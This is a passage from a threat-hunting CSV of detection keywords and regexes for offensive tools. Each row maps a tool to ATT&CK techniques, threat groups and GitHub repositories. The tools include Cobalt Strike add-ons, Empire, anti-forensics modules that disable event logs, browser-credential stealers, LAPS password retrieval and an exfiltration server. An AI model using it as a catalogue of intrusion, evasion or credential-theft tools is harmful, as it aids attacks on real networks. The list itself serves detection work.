T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 
- APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","60704" "*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","60705" "*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly 
builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","60706" "*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","60707" "*SweetPotato.ImpersonationToken*",".{0,1000}SweetPotato\.ImpersonationToken.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","60708" "*SweetPotato.sln*",".{0,1000}SweetPotato\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - 
CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","60709" "*SweetPotato-N*.exe*",".{0,1000}SweetPotato\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","60710" "*sweetsoftware/Ares*",".{0,1000}sweetsoftware\/Ares.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","60711" "*swikipedia@onionmail.org*",".{0,1000}swikipedia\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","60712" "*swisskyrepo/SharpLAPS*",".{0,1000}swisskyrepo\/SharpLAPS.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","60713" "*swisskyrepo/SSRFmap*",".{0,1000}swisskyrepo\/SSRFmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60714" "*Switching To Event Tracing Disabler Module*",".{0,1000}Switching\sTo\sEvent\sTracing\sDisabler\sModule.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60716" "*Switching To NTFS Last Access Time Disabler*",".{0,1000}Switching\sTo\sNTFS\sLast\sAccess\sTime\sDisabler.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60717" "*Switching To Prefetch Disabler*",".{0,1000}Switching\sTo\sPrefetch\sDisabler.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60718" "*Switching To ShellBag Remover*",".{0,1000}Switching\sTo\sShellBag\sRemover.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60719" "*Switching To USNJrnl Disabling Module*",".{0,1000}Switching\sTo\sUSNJrnl\sDisabling\sModule.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60720" "*Switching To Windows Event Log Disabler*",".{0,1000}Switching\sTo\sWindows\sEvent\sLog\sDisabler.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - 
T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60721" "*SwitchPriv.exe*",".{0,1000}SwitchPriv\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","60722" "*SxNade/Rudrastra*",".{0,1000}SxNade\/Rudrastra.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","60723" "*sxxuJBrIRnKNqcH6xJNmUc/7lE0UOrgWJ2vMbaAoR4c=*",".{0,1000}sxxuJBrIRnKNqcH6xJNmUc\/7lE0UOrgWJ2vMbaAoR4c\=.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#base64","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","60724" "*syhunt.com/sandcat/*",".{0,1000}syhunt\.com\/sandcat\/.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","N/A","6","6","525","72","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z","60725" 
"*syhunt/sandcat*",".{0,1000}syhunt\/sandcat.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","N/A","6","6","525","72","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z","60726" "*syhunt-sandcat-*.exe*",".{0,1000}syhunt\-sandcat\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","N/A","6","6","525","72","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z","60727" "*synacktiv/DLHell*",".{0,1000}synacktiv\/DLHell.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","60728" "*synacktiv/GPOddity*",".{0,1000}synacktiv\/GPOddity.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","60729" "*synacktiv/Invoke-RunAsWithCert*",".{0,1000}synacktiv\/Invoke\-RunAsWithCert.{0,1000}","offensive_tool_keyword","Invoke-RunAsWithCert","A PowerShell script to perform PKINIT authentication with the Windows API from a non domain-joined machine","T1550.003 - T1078 - T1027","TA0006 - TA0005","N/A","N/A","Lateral Movement","https://github.com/synacktiv/Invoke-RunAsWithCert","1","1","N/A","N/A","8","2","150","14","2024-05-13T08:26:56Z","2024-05-03T12:44:21Z","60730" "*synacktiv/ntdissector*",".{0,1000}synacktiv\/ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records 
of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","60731" "*synacktiv/OUned*",".{0,1000}synacktiv\/OUned.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","60732" "*synacktiv/SCCMSecrets*",".{0,1000}synacktiv\/SCCMSecrets.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","1","N/A","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","60733" "*synacktiv_gpoddity*",".{0,1000}synacktiv_gpoddity.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","60734" "*sync-starkiller*",".{0,1000}sync\-starkiller.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - 
T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","60735" "*synergy_httpx.py*",".{0,1000}synergy_httpx\.py.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","N/A","8","2","129","17","2024-07-19T06:40:59Z","2023-06-02T10:06:41Z","60739" "*Synergy-httpx-main*",".{0,1000}Synergy\-httpx\-main.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data 
Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","N/A","8","2","129","17","2024-07-19T06:40:59Z","2023-06-02T10:06:41Z","60740" "*syscall_disable_priv *",".{0,1000}syscall_disable_priv\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","N/A","10","10","55","20","2024-07-10T16:20:39Z","2021-09-14T17:47:08Z","60741" "*syscall_enable_priv 
*",".{0,1000}syscall_enable_priv\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","N/A","10","10","55","20","2024-07-10T16:20:39Z","2021-09-14T17:47:08Z","60742" "*syscall_inject.rb*",".{0,1000}syscall_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60743" "*syscalls.asm*",".{0,1000}syscalls\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - 
Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","60744" "*syscalls.nim*",".{0,1000}syscalls\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","60745" "*syscalls_dump.*",".{0,1000}syscalls_dump\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 